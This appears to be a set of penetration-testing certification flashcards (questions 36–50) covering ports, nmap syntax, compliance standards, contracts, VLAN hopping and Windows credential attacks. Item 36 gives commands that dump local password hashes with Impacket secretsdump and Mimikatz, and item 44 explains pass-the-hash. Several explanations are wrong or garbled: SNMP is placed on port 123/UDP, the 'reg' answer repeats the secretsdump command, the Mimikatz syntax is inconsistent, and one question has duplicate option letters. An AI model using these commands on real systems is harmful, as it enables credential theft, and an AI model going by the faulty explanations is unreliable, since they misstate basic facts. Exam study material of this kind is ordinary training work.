Explanation

Correct Answer: SYSVOL is correct. SYSVOL is a shared directory used to store logon scripts, Group Policy data, and other domain-wide data that is viewable by any user who is a member of the domain.

Incorrect Answers: ADMIN$ and C$ are incorrect because administrator privileges are required to mount those shares.

IPC$ is incorrect because the IPC$ share is used to provide information about the domain, but can be accessed through null sessions (i.e., anonymously).

36
Q

Which of the following commands can help recover the list of local hashes from the SAM database? (Choose three.)
A.’impacket-secretsdump [user]:[pass]@[ipaddress]’
B.’mimikatz_command -f samdump;;hashes’
C.The WIndows ‘reg’ command
D.’mimikatz_command -f samdump;;’

A

A.’impacket-secretsdump [user]:[pass]@[ipaddress]’
B.’mimikatz_command -f samdump;;hashes’
C.The WIndows ‘reg’ command

Explanation

Correct Answers: mimikatz_command -f samdump::hashes is correct because it will use Mimikatz to dump the list of local hashes from the SAM database.

impacket-secretsdump [user]:[pass]@[ipaddress] is correct because it will use Impacket (the version installed in Kali) to dump the SAM database remotely from a target host over the network without executing any type of an agent.

impacket-secretsdump [user]:[pass]@[ipaddress] is correct because the local Windows reg command can be used to save the contents of the System and SAM databases.

Incorrect Answer: Hashes can be recovered offline using Impacket.mimikatz_command -f samdump:: is incorrect. The command is incomplete and will only print the command options available for the samdump module within Mimikatz.

37
Q
Which of the following compliance standards require(s) organizations to maintain a secure environment? (Choose three.)
A.CIS
B.PCI DSS
C.HIPAA
D.NIST
E.FISMA
A

B.PCI DSS
C.HIPAA
E.FISMA

Explanation

Correct Answers: PCI DSS is correct because the Payment Card Industry (PCI) requires companies that accept, process, or store payment card information for consumers and merchants to go through a PCI Data Security Standard (DSS) assessment to help protect against credit card fraud.

HIPAA is correct because the Health Insurance Portability and Accountability Act (HIPAA) was put into place to safeguard the protected health information (PHI) of patients. HIPAA does not require a pentest per se, but does require information systems that contain PHI data to be evaluated for security risks.

FISMA is correct because the Federal Information Security Management Act (FISMA) is a U.S. federal law passed in 2002 that requires federal agencies to adopt and implement an information security protection program, such as outlined in the NIST Cybersecurity Framework. The key difference here is that these requirements are regulated by the government and hold organizations accountable when they are found to be noncompliant.

Incorrect Answers: CIS and NIST are incorrect. Cis is incorrect because the Center for Internet Security (CIS) provides standards and best practices that organizations can adopt to improve the security of their information systems and technologies.

NIST is incorrect because the National Institute for Standards and Technology (NIST) offers standards that organizations can adopt to help standardize security practices within the organization. CIS and NIST standards are not requirements until they are put into practice and mandated by an organization. These answers are incorrect because CIS and NIST are organizations, not standards.

38
Q
Which of the following services can aide a pentester with lateral movement? (Choose all that apply.)
A.DCOM
B.REXEC
C.RSH
D.Telnet
E.All of the answer choices are correct
A

E.All of the answer choices are correct

Explanation

Correct Answer: All of the answers are correct. All of the services can aide a pentester with lateral movement. RSH and REXEC (“R-services”) allow remote logins and remote command execution. Telnet allows for remote login capability, and the Windows distributed component object model (DCOM) can be used on a Windows host to extend the functionality of the component object model (COM) from the local computer to other computers, using remote procedure call (RPC) technology.

Incorrect Answers: All of the other choices are incorrect as individual responses . All of the answers can aide a pentester with lateral movement techniques, making ALL OF THE ANSWERS the correct choice.

39
Q
Which service is the following nmap command syntax going to scan?```nmap -n -Pn -sUV -p 53 192.168.1.50```
A.SNMP
B.DNS
C.FTP
D.NTP
A

B.DNS

Explanation

Correct Answer: DNS is correct. The port number being scanned is 53/udp, which hosts the Domain Name System (DNS).

Incorrect Answers: SNMP is incorrect because the SNMP service listens on port 123/UDP.

FTP is incorrect because FTP listens on port 21/tcp.

NTP is incorrect because NTP listens on port 123/UDP.

40
Q
Which command can be used to help analyze the contents of a binary file? (Select two)
A.'strings'
B.'binwalk'
C.'echo'
D.'cat'
A

A.’strings’
B.’binwalk’

Explanation

Correct Answers: strings’ is correct because the strings command is a useful utility in Linux to print the strings of printable characters in files (that is, ASCII characters) that are at least four characters in length.

‘binwalk’ is correct because the binwalk command is a fast and easy-to-use tool for analyzing and reverse-engineering executables and firmware images, such as those loaded on embedded devices (Wi-Fi routers, IoT, and so on).

Incorrect Answers: ‘cat’ is incorrect because the cat (or “concat”) command in Linux will concatenate files and print on the standard output. This would not be a very useful tool/command to use when reading a binary file as there are a number of nonprintable characters in a binary that would fill the terminal window up with yucky, unreadable characters and make it difficult to read the printable strings.

‘echo’ is incorrect because the echo command in Linux is not useful, as it will only repeat the single line of text when the binary filename is passed as an argument to the command. For example, echo binary will print the word “binary” to the terminal and nothing more.

41
Q
Which contractual document is signed by two consenting parties to protect each other's competitive advantages?
A.RoE
B.MSA
C.NDA
D.SOW
A

C.NDA

Explanation

Correct Answer: NDA is correct. A nondisclosure agreement (NDA) is a confidentiality agreement that protects a business’s competitive advantage by protecting its proprietary information and intellectual property. This document is fully executed by both parties (signed into action) prior to working together.

Incorrect Answers: RoE is incorrect because the rules of engagement (RoE) document puts into writing the guidelines and constraints regarding the execution of a pentest.

SOW is incorrect because the statement of work (SOW) is a formal document, routinely employed in the field of project management, that outlines project-specific work to be executed by a service vendor for an organization, and is typically executed after the NDA is fully executed.

MSA is incorrect because the master service agreement (MSA) is a type of overarching contract between two or more parties where each party agrees to most terms that will govern all other future transactions and agreements. The MSA does not cover competitive advantages to protect each business; this document is used to cover other items such as payment terms, dispute resolution, corporate social responsibility, business ethics, network and facility access, etc.

42
Q
Which of the following command-line utilities can be used to interrogate a DNS server?
A.'domainname'
B.'whois'
C.'dig'
D.'bind'
A

C.’dig’

Explanation

Correct Answer: Dig is correct. The dig command can be used to interrogate DNS servers by asking various questions like what types of records (A, MX, etc.) it supports, and is sometimes used by administrators to troubleshoot DNS-related problems.

Incorrect Answers: Domain name is incorrect because the domainname command will only print the domain name of the host you executed the command from.

Bind is incorrect because bind is used in Linux network programming to assign a local address to a socket before the socket can start to receive connections.

Whois is incorrect because the whois command looks up domain registration information and is not used for interrogating a DNS server.

43
Q
VNC passwords that rely on DES encryption can be a maximum of how many characters in length?
A.10
B.6
C.8
D.12
A

C.8

Explanation

Correct Answer: 8 is correct. VNC passwords that use DES encryption will be truncated to the length of eight characters, regardless of what the user sets the password to be.

Incorrect Answers: This is a limitation of DES. 6, 10, and 12 are incorrect because DES encryption supports up to eight characters in length.

44
Q
Which of the following hash types is used in pass the hash (PtH) attacks?
A.NTLMv2
B.MD5
C.NTLM
D.SHA256
A

C.NTLM

Explanation

Correct Answer: NTLM is correct. The NTLM hash is stored in the Security Account Manager (SAM) database on the local computer, or the NTDS.dit database on the Domain Controller. An NT or NTLM hash can be used for remote authentication, which is permitted with relay or pass the hash (PtH) methods of attack.

Incorrect Answers: MD5 and SHA256 are incorrect because MD5 and SHA256 are not typically used in PtH attacks.

NTLMv2 is incorrect because NTLMv2 hashes (or sometimes referred to as Net-NTLMv2), which are used for network authentication and are based on a user’s NTLM hash and derived from a challenge/response algorithm, cannot be replayed over the network.

45
Q
Which of the following TCP ports host applications that naturally support file transfer capabilities? (Choose three.)
A.22
B.80
C.902
D.21
E.53
A

A.22
B.80
D.21

Explanation

Correct Answers: 21 is correct because port 21 is used by the File Transfer Protocol (FTP) to GET, PUT, and DELETE files from a remote server.

80 is correct because port 80 hosts the Hypertext Transfer Protocol (HTTP), which can be used to transfer files and data using various HTTP methods such as GET and PUT.

22 is correct because port 22 hosts the Secure Shell (SSH) protocol and is used to transfer files over a secure, encrypted communication channel.

Incorrect Answers: 53 is incorrect because port 53 hosts the Domain Name System (DNS), which is used for host name and IP address translation.

902 is incorrect because port 902 hosts the VMware Server SOAP port and is typically used for authentication to the hypervisor. Neither of these ports was intended to act as a file transfer utility.

46
Q
What is something you want to document after a pentest to prevent similar events and issues from happening in the future, or something you want to document that went well during the pentest?
A.Methodology
B.Lessons Learned
C.FIndings
D.Escalation path
A

B.Lessons Learned

Explanation

Correct Answer: Lessons learned is correct. The lessons learned from a pentest can help an organization or pentester (or pentest team) overcome obstacles and challenges in the future, so they don’t repeat the same course of action that was not successful. It is also good practice to document the things that did work, as that particular course of action proved to be successful and could be used to overcome a challenge or obstacle of a similar category in the future.

Incorrect Answers: Escalation path is incorrect because the escalation path is defined in the RoE.

Methodology is incorrect because the methodology is defined in the SOW and RoE and agreed upon before the pentest engagement.

Findings is incorrect because the findings are documented in the pentest report and are prioritized by the organization for appropriate remediation.

47
Q

When executing a UDP port scan against a customer network, you want to start out by scanning only those ports that are known to have UDP services present. Which of the following options can you use to scan for SNMP, NTP, NetBIOS, and DNS?
A.’nmap -vv -sUV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan’
B.’nmap -vv -sUV -p 53,123,137-139, 161,123 192.168.1.0/24 -oA udpscan’
C.’nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan
D.’nmap -vv -sUV -p 53-161 192.168.1.0/24 -oA udpscan’

A

C.’nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan

Explanation

Correct Answer: nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan is correct. The -p port flag is used to specify the particular port or port range to use for the scan. Each port must either be specified in a range (for example, 137-139) or comma delineated with no spaces (for example, 53,123,137-139,161). This scan syntax will satisfy the protocol requirement for finding SNMP (161/UDP), NTP (123/UDP), NetBIOS (137/UDP-139/UDP), and DNS (53/UDP).

Incorrect Answers:nmap -vv -sUV -p 53, 123, 137-139, 161, 123 192.168.1.0/24 -oA udpscan is incorrect because the ports have spaces between them.

nmap -vv -sUV -p 53-161 192.168.1.0/24 -oA udpscan and nmap -vv -sUV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan are incorrect because the port ranges will include other ports and protocols that are nonessential given the conditions for the scan requirements.

48
Q
Which of the following are common methods used to accomplish VLAN hopping on switched networks? (Choose two.)
A.Switch SPoofing
B.NAC
C.DNS Spoofing
D.Double Tagging
A

A.Switch SPoofing
D.Double Tagging

Explanation

Correct Answers: Double tagging and switch spoofing are correct. Double tagging is correct because double tagging is a result of a switch port being configured to use native VLANs, where an attacker can craft a packet and prepend a false VLAN tag along with its native VLANs. The native VLAN tag (i.e., VLAN 1) is not forwarded (since it’s the native VLAN), but the false VLAN tag is forwarded to the next switch and sent to the target host as if it originated from the target’s native VLAN.

Switch spoofing is correct because switch spoofing is a type of VLAN hopping attack that occurs when an attacker can emulate a valid trunking switch on the network by speaking 802.1Q. This typically takes advantage of a default configuration or an improperly configured switch that has all switch ports in the “dynamic desirable” mode, which means the switch will negotiate the port mode as either an access port or trunk port. Once the attacker announces that his workstation is a trunk port, the switch will trunk all VLANs over the switch port that the attacker’s workstation is plugged into.

Incorrect Answers: DNS spoofing is incorrect because DNS spoofing is an attack method used to impersonate a victim’s DNS server, forcing them to navigate to a malicious website.

NAC is incorrect because Network Access Control (NAC) is a security control that helps provide end point visibility and enforce organizational policy through technical controls.

49
Q
Which of the following can be used to automatically set the RHOSTS field for the Metasploit module using the results of a search? (Select all that apply.)
A.'hosts -R'
B.'notes -S "http" -R'
C.All of the answer choices are correct
D.'vulns -p 22 --rhosts'
D.'services -p 445 -R'
A

C.All of the answer choices are correct

Explanation

Correct Answer: All of the answers are correct. Each command option uses the -R or --rhosts option to define the RHOSTS field in a Metasploit module, based on the return of a search. However, if the search yields no results, the RHOSTS field will not be set.

Incorrect Answers: All of the other choices are incorrect as individual responses . The only single selection that is correct is “All of the answers are correct.

50
Q
What is the methodology or process of enumerating useful information from a target over the network?
A.Scanning
B.Network infromation gathering 
C.Fingerprinting
D.Vulnerability identification
A

B.Network infromation gathering

Explanation

Correct Answer: Network information gathering is correct. Network information gathering is the methodology used to enumerate useful information from a target over the network, which includes scanning, fingerprinting, and vulnerability identification.

Incorrect Answers: The other choices are incorrect because these are all testing activities that fall under the network information gathering methodology.